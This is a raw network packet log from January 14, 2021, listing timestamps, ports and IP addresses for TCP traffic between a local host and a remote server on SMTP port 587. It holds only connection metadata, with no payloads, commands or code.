Jan 14, 2021 08:01:58.818099976 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.818341017 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.818450928 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.818514109 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.818583012 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.818600893 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.818649054 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.818762064 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.818849087 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.818938971 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.819097996 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.819394112 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.834691048 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.838259935 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.840580940 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.919464111 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.919488907 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.919599056 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.919599056 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.919651985 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.961922884 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.961949110 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.961963892 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.962153912 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.962261915 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.962435007 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.989257097 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.989408016 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.008186102 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.008266926 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.008930922 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.008951902 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.009123087 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.009315968 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.009330988 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.009351015 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.009568930 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.009640932 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.009658098 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.009991884 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.030659914 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.069823980 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.070419073 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.109524965 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.109551907 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.109628916 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.109651089 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.109752893 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.109797955 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.152230978 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.152247906 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.152267933 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.152344942 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.152369976 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.152400017 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.152451992 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.152462959 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.198231936 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.198880911 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.199024916 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199080944 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.199094057 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199137926 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199141026 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.199189901 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.199251890 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199352026 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.199536085 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199563026 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.199649096 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199682951 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199728012 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199754000 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.199795008 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.199820042 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.199875116 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.200061083 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.200264931 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.260036945 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.260565042 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.261195898 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.261311054 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.261440992 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.261565924 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.261723995 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.261845112 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.262007952 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.299936056 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.301173925 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.342490911 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.342520952 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.342538118 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.342573881 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.342591047 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.342616081 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.342643023 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.342667103 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.389080048 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.389095068 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.389131069 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.389168024 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.389215946 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.389470100 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.389592886 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.389851093 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.389864922 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.389909983 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.389930964 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.389955997 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.389955997 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.389978886 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.389998913 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.390258074 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.390280008 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.390292883 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.390326977 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.390351057 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.450839996 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.450862885 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.450937033 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.451009989 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.451083899 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.451167107 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.451256990 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.451332092 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.451493979 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.451571941 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.451663017 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.452117920 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.491317034 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.491333008 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.491343975 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.491425037 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.491483927 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.532645941 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.532663107 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.532716036 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.532802105 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.532828093 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.532870054 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.579375982 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.579390049 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.579400063 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.579500914 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.579530954 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.579587936 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.579898119 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.579968929 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.580053091 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.580080986 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.580151081 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.580542088 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.582911015 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.640630960 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.640733957 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.640749931 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.640815973 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.641197920 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.641222954 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.641369104 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.641663074 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.641824007 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.681463003 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.681495905 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.681520939 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.681591034 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.681668043 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.722827911 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.722922087 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.722934008 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.723051071 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.723062992 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.723133087 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.769639969 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.769678116 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.769709110 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.769805908 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.769861937 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.770066023 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.770138025 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.770174026 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.770204067 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.770239115 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.770277977 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.774272919 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.774316072 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.774461985 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.830588102 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.830754995 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.830986977 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.831078053 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.831187010 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.831219912 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.831281900 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.831300020 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.831310034 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.831331968 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.831403017 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.831507921 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.831764936 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.871692896 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.871718884 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.871731043 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.871826887 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.871850967 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.871892929 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.872863054 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.913201094 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.913235903 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.913252115 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.913281918 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.913366079 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.913438082 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.959866047 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.960026026 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.960283995 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.960303068 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.960376978 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.960484028 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.960746050 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.961958885 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:59.964900017 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:59.965019941 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.020448923 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.020546913 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.020770073 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.020829916 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.020921946 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.020960093 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.020963907 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.021028996 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.021128893 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.021153927 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.021235943 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.021441936 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.022239923 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.022332907 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.022460938 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.022551060 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.022650957 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.022749901 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.022846937 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.022933006 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.023036957 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.023123026 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.023209095 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.023359060 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.028084040 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.062047005 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.062069893 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.062134981 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.062181950 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.062885046 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.063220978 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.103926897 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.103959084 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.104156971 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.150147915 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.150499105 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.150557995 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.150624037 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.150675058 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.150718927 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.150732994 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.151021004 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.152076960 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.152097940 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.153091908 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.155056953 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.155188084 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.155219078 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.155283928 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.211035967 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.211055994 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.211071014 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.211086035 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.211106062 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.211122036 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.211189032 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.211256981 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.211922884 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212243080 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212265968 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212295055 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212337017 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212620974 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212663889 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212697029 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212743998 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.212924957 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.217883110 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.232611895 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.252185106 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.252211094 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.253072977 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.253146887 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.253230095 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.284703016 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.294193029 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.294228077 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.294286013 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.294290066 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.294342995 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.294378996 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.294405937 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.294559956 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.341026068 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.341062069 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.341193914 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.341309071 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.341408014 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.341469049 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.343425035 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.343467951 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.345422983 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.345511913 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.345833063 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.346121073 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.443217039 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.443248987 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.443300962 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.443459034 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.443598032 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.444169044 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.484482050 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.484589100 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.484664917 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.484678984 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.484709024 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.484812975 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.531529903 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.531570911 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.531589985 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.531645060 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.531662941 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.531683922 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.531686068 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.531728983 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.531754017 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.535598993 CET	587	49814	199.193.7.228	192.168.2.3
